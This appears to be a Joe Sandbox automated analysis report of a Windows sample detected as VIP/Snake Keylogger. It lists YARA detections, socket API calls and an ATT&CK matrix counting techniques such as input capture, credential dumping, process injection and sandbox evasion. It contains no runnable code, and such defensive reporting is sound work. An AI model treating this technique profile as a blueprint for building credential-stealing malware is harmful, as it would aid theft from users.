Source: Yara match	File source: 00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3c638k0NJx.exe PID: 7156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6320, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3c638k0NJx.exe.da0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3c638k0NJx.exe.da0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3c638k0NJx.exe PID: 7156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6320, type: MEMORYSTR

Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CA6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00CA6283
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CA6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00CA6747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	31 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 Software Packing	NTDS	127 System Information Discovery	Distributed Component Object Model	21 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 DLL Side-Loading	LSA Secrets	131 Security Software Discovery	SSH	3 Clipboard Data	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3c638k0NJx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
3c638k0NJx.exe